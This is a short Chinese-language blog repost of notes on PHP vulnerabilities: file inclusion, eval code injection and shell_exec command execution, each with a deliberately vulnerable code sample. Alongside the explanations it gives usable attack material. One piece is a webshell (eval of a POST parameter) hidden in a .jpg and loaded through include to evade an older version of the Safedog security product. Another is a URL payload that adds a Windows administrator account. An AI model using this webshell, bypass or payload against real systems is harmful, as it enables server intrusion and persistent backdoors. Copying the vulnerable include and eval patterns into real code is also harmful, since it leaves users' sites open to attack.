码迷,mamicode.com
首页 > Web开发 > 详细

Php 漏洞代码

时间:2016-07-03 00:13:23      阅读:369      评论:0      收藏:0      [点我收藏+]

标签:

Php包含漏洞      易裤cms包含漏洞  
<? $i = $_GET[‘t‘]; include($i); //http://127.0.0.1/include/include.php?t=test.txt //$i=test.txt

?>

技术分享

 

结论:文件包含意味着以php脚本格式去执行包含的文件

远程包含,本地包含原因:

1.php.iniallow_url_include设置开启则可存在远程包含

技术分享

 

2.Php编程中包含函数的选用.

 

低版本安全狗后门绕过采用的文件包含漏洞

 

上传两个文件

 

1.logo.jpg 代码 <?php eval($_POST[‘pass’]);?>

 

2.Xx.php  代码 <?php include(“logo.jpg”)?>

 

 

代码执行漏洞 
thinkphp代码执行漏洞
跟菜刀原理差不多

eval assert相关函数

 

<?php
$id = $_GET[‘x‘];
eval("$id");

 

?>

http://192.168.0.111/phpexp/eval.php?x=exec("net localgroup  administrators test /add");

 

 

命令执行

execshell_execsystem等函数引起的漏洞

程序员在开发cms网站时,函数后存在可控变量,会导致命令执行漏洞


<?php $cmd = $_GET[‘x‘]; echo shell_exec($cmd); ?>

 

Php 漏洞代码

标签:

原文地址:http://www.cnblogs.com/test404/p/5636204.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!